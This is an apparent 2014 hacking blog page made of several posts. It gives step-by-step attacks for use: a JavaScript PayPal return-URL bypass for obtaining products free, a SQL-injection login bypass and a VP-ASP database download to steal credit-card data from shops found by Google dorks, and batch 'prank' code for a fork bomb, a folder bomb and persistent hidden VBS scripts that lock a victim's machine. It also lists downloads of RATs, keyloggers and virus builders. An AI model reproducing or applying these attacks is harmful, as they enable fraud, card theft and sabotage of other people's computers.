Saturday, 8 March 2014

Paypal Javascript Exploit

                         Paypal Javascript Exploit

Here is a simple JavaScript exploit through which you can hack Paypal & download products for free without spending single penny . More then 500 sites are Vulnerable !! .

Step by Step Guide :

  • Go to the vulnerable site & paste the below JavaScript given below in the browser & hit enter ! .

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

  • So after you have hit enter, just sit back & enjoy the free product . 

Live Demo :~#

So after you paste the JavaScript in the URL then the product will be automatically downloaded :)

More Vulnerable sites link -  (some sites are patched)

So as you all know that its will contain many details .But remember you can go behind the bars for this . Its a big Crime .We have provided this Tutorial to make all of you aware of such hacks 

Admin Page Vulnerability | Hacking Credit Card


Admin Page Vulnerability | Hacking Credit Card

Here is the second part of Hacking Credit Card . Another easy & working Exploit .

Step By Step Guide :~#
  • Go to Google & type this Dork  -  inurl:\"/cart.php?m=\"
  • After that the Target URL will look like - (Demo) .
  • Then now we will find the admin page & hack into the website so we will modify the URL to find the Admin page 

Now you will be asked username & password so write this -
Username - 'or'1'='1
Password - 'or'1'='1

So as you all know that its will contain many credit card details as its a shopping site !But remember you can go behind the bars for this . Its a big Crime .We have provided this Tutorial to make all of you aware of such hacks .

VP-ASP Shopping Cart 5.00 Exploit

                  VP-ASP Shopping Cart 5.00 Exploit 

Here is a small exploit to Hack & Steal Credit card info & many other data from a site .

Step By Step Guide :~#

  • Go to Google & type this Dork  - intitle: VP-ASP Shopping Cart 5.00 l
  • After that the Target URL will look like -  (Demo)
  • Then there you can see many details like xDatabase xDatabas Location xEmail & Many others  so the thing we have to do here site get the Database of that particular Website .
  • To get the database we will modify the URL 

Live Demo :

Target -
Exploit -

So here we have exploited the database  to get all the data of the website  . Just Replace the diag_dbtest.asp to shopping/shopping550.mdb (xDatabase) .

Enabling God Mode in Windows 7.

                           Enabling God Mode in Windows 7

In this post I will show you how you can enable God Mode on your windows 7 machine.
Which will bring all the windows setting under one hood without needing to browse options and folders in the Control Panel. The term “GOD MODE” is given by Microsoft Development Team.
Follow the steps described below-

1.Create a new folder.
2.Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}  (you          can change the name GodMode to any name as you wish but remember not to change the text after GodMode.
3.The icon of your folder will change. Double click on it to open the GOD MODE window.

Caller ID Spoofing:Display any number when you call your friend.

Caller ID Spoofing:Display any number when you call your friend.

In this post I will be showing you guys how to do Caller ID Spoofing. It is basically a trick in which you can display any mobile number of your choice on your victims mobile when you call him. For performing this simple trick there is a very cool website called CrazyCall.

Deadly batch file Tricks

                        Deadly batch file  Tricks

1. Crash a Computer with just a link

Click Here (

2. Folder Bomber
This batch file will create 3000+  folder in less than a minute.

Open your notepad and type the following codes.

@echo off


md %random%

goto top

Save it as 3000.bat

Give this file to your friend and   when he will click on that his nightmare will be started.

Above Code Explained.

@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and 

%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

2. Fork Bomber
It is  another batch file which ulitises 100% computer resources and memory 

making your computer irresponsive and at last your compuer hangs. Just copy 

and paste 

the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />

3. Getting Blue Screen Of Death (BOSD)
You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever 

you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to 

crash your Windows box. 
Method 1: Windows Built-in Self Crasher
This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to 

reboot it. Just follow these steps:

Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC
Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key 


3. Prank Virus
Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.
@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo LOOP>>1234.vbs
copy /y 123.vbs C:\
copy /y 1234.vbs C:\
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 1
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
start 123.vbs
start 1234.vbs
echo Code Smahser owns your computer!!>>c:\almasmalik.txt
echo Code Smahser owns your computer!!>>d:\almasmalik.txt
echo Code Smahser owns your computer!!>>e:\almasmalik.txt

5. Open Command Prompt Window infinite times untill your Computer Crashes
Just copy and paste the below codes to make your computer crash. (After you will restart your computer, it will be back to normal)
@echo off
start cmd.exe
goto loop
"cmd.exe" can be changed to any other program also like Calculator. For calculator use calc.exe, for My Computer use explorer.exe and so on.

Sunday, 2 March 2014

All your necessary downloads in one spot

All your necessary downloads in one spot

Security Tools:

Microsoft Security Essentials
Super Anti-Spyware Portable (COM)
Hijack This!


Revo Uninstaller
O&O Defrag

Parental Control:

Crawler Parental Control

Internet and Multimedia:

Adobe Flash Player
Adobe Reader
Adobe Shockwave Player
VLC Media Player
VNC Enterprise Edition

Live CD/DVDs:

Super OS

Educational: (Trojanware)

Poison Ivy 2.3.2
ProRat v1.9
Ace RAT 1.0 [Password is ""]
AMRC 1.1 [Password is ""]
A-311 Death 1.29 [Password is ""]
Amitis 1.4.3 [Password is ""]
Assasin 2.3 Pegasus [Password is ""]
Blade Runner 0.80 Alpha [Password is ""]
TeraBIT RAT 1.3 SE [Password is ""
Yuri RAT v1.2 (Mirror)
MofoTro 1.7 (Mirror)
Omerta v1.3 (Mirror)
Theef v2.10 (Mirror)
Combined Forces R.A.T (Mirror)
MoSucker v3.0 (Mirror)

Educational: (Keyloggers)

KGB Keylogger 4.5
Project Satan 2.0 [Password is ""]
Elite Keylogger Editor v1.0 (Mirror)
SKL 0.1 (Mirror)
Key Spy v2.0 (Mirror)
APlus (Mirror)

Educational: (NET Tools)

Cain and Able
Net Tools 5.0
istealer 6.0
Blues Port Scanner (Mirror)
ProPort v2.2 (Mirror)
SuperScan v3.0 (Mirror)
Net Scan Tools v4.2 (Mirror)
LanSpy v2.0 (Mirror)
Trojan Hunter v1.5 (Mirror)
Neotrace PRO v3.25 (Mirror)

Educational: (Virus Builders)

TeraBIT Virus Maker 3.2 [Password is ""]
Dr. VBS Virus Maker (Mirror)
VBSwg 2 - Virus builder (Mirror)
p0ke's WormGen 2.0 (Mirror)

Educational: (Downloaders)

Passive Terror v1.3 Final Edition (Mirror)
Silent Assassin v2.0 (Mirror)
Fearless Downloader v2.0 (Mirror)
Dyn-dl (Dynamic Downloader) (Mirror)
Troll downloader fwbp++ v1.0 (Mirror)
Cryptic Downloader (Mirror)
HookByter (Mirror)
Webdownloader 1.0 (Mirror)
DWTC Iced v2.1 (Mirror)

Educational: (Binders)

Daemon Crypt Public v2 (Mirror)
NT Packer v2.1 (Mirror)
EES Binder v1.0 (Mirror)
CoolBind v3 (Mirror)
Bytes Adder (Mirror)
FreshBind v2.01 (Mirror)
NakedBind v1.0 (Mirror)
Amok Joiner (Mirror)

Educational: (Nukers & Flooders)

Rocket v1.0 (Mirror)
RPCNuke v1.0 (Mirror)
Panther Mode2 - ISDN + (Mirror)
Final Fortune v2.4 (Mirror)
Battle Pong - Technophoria (Mirror)
ICMP Nuker(Mirror)
Click v2.2(Mirror)

Educational: (VB Runtime Files)


Educational: (Other)

Admin.Troj.Kikzyurarse [Password is ""] (Will add any user to Admin within Windows)
Portable Linux (Linux ISO executed within Windows as an EXE)


Python Tutorial - Part 2

Python Tutorials Part 2 After installation of Python software on windows machine in previous tutorial, lets proceed ...